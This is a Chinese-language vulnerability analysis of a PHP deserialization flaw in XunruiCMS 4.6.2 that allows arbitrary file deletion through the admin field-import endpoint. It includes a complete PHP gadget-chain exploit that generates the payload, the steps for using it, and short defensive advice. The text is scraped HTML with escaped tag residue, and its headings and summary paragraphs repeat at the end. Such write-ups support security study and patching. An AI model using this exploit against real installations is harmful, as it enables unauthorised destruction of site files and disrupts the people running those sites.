XunruiCMS 4.6.2 反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2>
XunruiCMS 4.6.2及以下版本中存在一个反序列化漏洞，攻击者可以通过精心构造的序列化数据实现任意文件删除。该漏洞位于`dr_string2array<\/code>函数中，由于对用户输入数据的不安全反序列化操作导致。<\/p>`

漏洞分析<\/h2>
漏洞点定位<\/h3>
漏洞核心位于文件\xunruicms\dayrui\Fcms\Core\Helper.php<\/code>中的dr_string2array<\/code>函数：<\/p>
function<\/span> dr_string2array<\/span>($data, $limit =<\/span> ''<\/span>) {
<\/span><\/span>    if<\/span> (!<\/span>$data) {
<\/span><\/span>        return<\/span> [];
<\/span><\/span>    } elseif<\/span> (is_array<\/span>($data)) {
<\/span><\/span>        $rt =<\/span> $data;
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        $rt =<\/span> json_decode<\/span>($data, true<\/span>);
<\/span><\/span>        if<\/span> (!<\/span>$rt) {
<\/span><\/span>            $rt =<\/span> unserialize<\/span>(stripslashes<\/span>($data));
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    if<\/span> (is_array<\/span>($rt) &&<\/span> $limit) {
<\/span><\/span>        return<\/span> dr_arraycut<\/span>($rt, $limit);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $rt;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键问题：<\/p>

函数首先尝试json_decode<\/code>，失败后会进入unserialize<\/code><\/li>
unserialize<\/code>前使用了stripslashes<\/code>函数处理数据<\/li>
可以通过将\<\/code>改为\\<\/code>来绕过stripslashes<\/code>的影响<\/li>
<\/ol>
传参入口<\/h3>
通过搜索dr_string2array<\/code>函数的调用，发现可利用的入口在\xunruicms\dayrui\Fcms\Control\Admin\Field.php<\/code>的import_add<\/code>方法：<\/p>
public<\/span> function<\/span> import_add<\/span>() {
<\/span><\/span>    if<\/span> (IS_POST<\/span>) {
<\/span><\/span>        $code =<\/span> $this-><\/span>input<\/span>-><\/span>post<\/span>('code'<\/span>);
<\/span><\/span>        $arr =<\/span> explode<\/span>("<\/span>\r\n<\/span>"<\/span>, $code);
<\/span><\/span>        if<\/span> (!<\/span>$arr) {
<\/span><\/span>            $this-><\/span>_json<\/span>(0<\/span>, 'code参数为空'<\/span>);
<\/span><\/span>        }
<\/span><\/span>        foreach<\/span> ($arr as<\/span> $t) {
<\/span><\/span>            $data =<\/span> dr_string2array<\/span>($t);
<\/span><\/span>            \/\/ ...
<\/span><\/span><\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>访问路径：<\/p>
http:\/\/127.0.0.1\/admin3a609e1d6cff.php?c=field&m=import_add
<\/code><\/pre>
需要管理员权限才能访问。<\/p>
利用链分析<\/h2>
反序列化起点<\/h3>
通过分析__destruct<\/code>方法寻找可利用点，共找到5个：<\/p>

第一个__destruct<\/code><\/strong>：需要$this->memcached<\/code>是Memcached<\/code>或Memcache<\/code>实例，利用空间有限<\/li>
第二个__destruct<\/code><\/strong>：需要$this->SMTPConnect<\/code>是资源类型，利用空间有限<\/li>
第三个__destruct<\/code><\/strong>：调用self::wipeDirectory<\/code>，可能导致文件删除<\/li>
第四个__destruct<\/code><\/strong>：仅释放变量，无利用价值<\/li>
第五个__destruct<\/code><\/strong>：调用$this->redis->close()<\/code>，有较大利用空间<\/li>
<\/ol>
利用链构建<\/h3>
选择第五个__destruct<\/code>作为起点，构建利用链：<\/p>

RedisHandler::__destruct()<\/code> -> $this->redis->close()<\/code><\/li>
控制$this->redis<\/code>为MemcachedHandler<\/code>实例<\/li>
MemcachedHandler::close()<\/code> -> $this->memcached->delete($this->lockKey)<\/code><\/li>
控制$this->memcached<\/code>为FileHandler<\/code>实例<\/li>
FileHandler::delete()<\/code> -> 任意文件删除<\/li>
<\/ol>
关键点：<\/p>

FileHandler::delete()<\/code>中的$key<\/code>参数可控<\/li>
$this->path<\/code>可控，可以是绝对或相对路径<\/li>
validateKey<\/code>方法对$key<\/code>的处理不会影响文件删除操作<\/li>
<\/ul>
漏洞利用<\/h2>
利用条件<\/h3>

获取管理员权限<\/li>
PHP版本7.4+（因PHP7.1+对属性类型不敏感）<\/li>
<\/ol>
EXP构造<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> CodeIgniter\Cache\Handlers<\/span>;
<\/span><\/span>use<\/span> CodeIgniter\Session\Handlers\BaseHandler<\/span>;
<\/span><\/span>use<\/span> CodeIgniter\Session\Handlers\MemcachedHandler<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> RedisHandler<\/span> extends<\/span> BaseHandler<\/span> {
<\/span><\/span>    public<\/span> $redis;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>redis<\/span> =<\/span> new<\/span> MemcachedHandler<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> CodeIgniter\Session\Handlers<\/span>;
<\/span><\/span>use<\/span> CodeIgniter\Session\Handlers\BaseHandler<\/span>;
<\/span><\/span>use<\/span> CodeIgniter\Cache\Handlers\FileHandler<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> MemcachedHandler<\/span> extends<\/span> BaseHandler<\/span> {
<\/span><\/span>    public<\/span> $memcached;
<\/span><\/span>    public<\/span> $lockKey;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>memcached<\/span> =<\/span> new<\/span> FileHandler<\/span>();
<\/span><\/span>        $this-><\/span>lockKey<\/span> =<\/span> "1.txt"<\/span>; \/\/ 要删除的文件名
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> CodeIgniter\Session\Handlers<\/span>;
<\/span><\/span>abstract<\/span> class<\/span> BaseHandler<\/span> {}
<\/span><\/span>
<\/span><\/span>namespace<\/span> CodeIgniter\Cache\Handlers<\/span>;
<\/span><\/span>use<\/span> CodeIgniter\Session\Handlers\BaseHandler<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> FileHandler<\/span> extends<\/span> BaseHandler<\/span> {
<\/span><\/span>    public<\/span> $path;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>path<\/span> =<\/span> ".\/"<\/span>; \/\/ 文件路径
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>use<\/span> CodeIgniter\Cache\Handlers\RedisHandler<\/span>;
<\/span><\/span>$str =<\/span> serialize<\/span>(new<\/span> RedisHandler<\/span>());
<\/span><\/span>$newStr =<\/span> str_replace<\/span>('\\'<\/span>, '\\\\'<\/span>, $str);
<\/span><\/span>echo<\/span> urlencode<\/span>($newStr).<\/span>"<\/span>\n<\/span>"<\/span>;
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>利用步骤<\/h3>

构造上述EXP生成payload<\/li>
以管理员身份登录系统<\/li>
访问\/admin3a609e1d6cff.php?c=field&m=import_add<\/code><\/li>
POST提交code<\/code>参数，值为生成的payload<\/li>
系统将删除指定路径下的文件<\/li>
<\/ol>
防御措施<\/h2>

避免直接反序列化用户输入<\/li>
使用白名单验证反序列化数据<\/li>
更新到最新版本XunruiCMS<\/li>
限制管理员后台访问权限<\/li>
<\/ol>
总结<\/h2>
该漏洞通过精心构造的反序列化链实现了任意文件删除，危害较大。开发人员应重视反序列化操作的安全性，避免直接处理不可信数据。系统管理员应及时更新系统并严格控制后台访问权限。<\/p>

XunruiCMS 4.6.2 反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2> XunruiCMS 4.6.2及以下版本中存在一个反序列化漏洞，攻击者可以通过精心构造的序列化数据实现任意文件删除。该漏洞位于dr_string2array<\/code>函数中，由于对用户输入数据的不安全反序列化操作导致。<\/p>

利用链分析<\/h2>

漏洞利用<\/h2>

总结<\/h2> 该漏洞通过精心构造的反序列化链实现了任意文件删除，危害较大。开发人员应重视反序列化操作的安全性，避免直接处理不可信数据。系统管理员应及时更新系统并严格控制后台访问权限。<\/p>

漏洞概述<\/h2>
XunruiCMS 4.6.2及以下版本中存在一个反序列化漏洞，攻击者可以通过精心构造的序列化数据实现任意文件删除。该漏洞位于`dr_string2array<\/code>函数中，由于对用户输入数据的不安全反序列化操作导致。<\/p>`

总结<\/h2>
该漏洞通过精心构造的反序列化链实现了任意文件删除，危害较大。开发人员应重视反序列化操作的安全性，避免直接处理不可信数据。系统管理员应及时更新系统并严格控制后台访问权限。<\/p>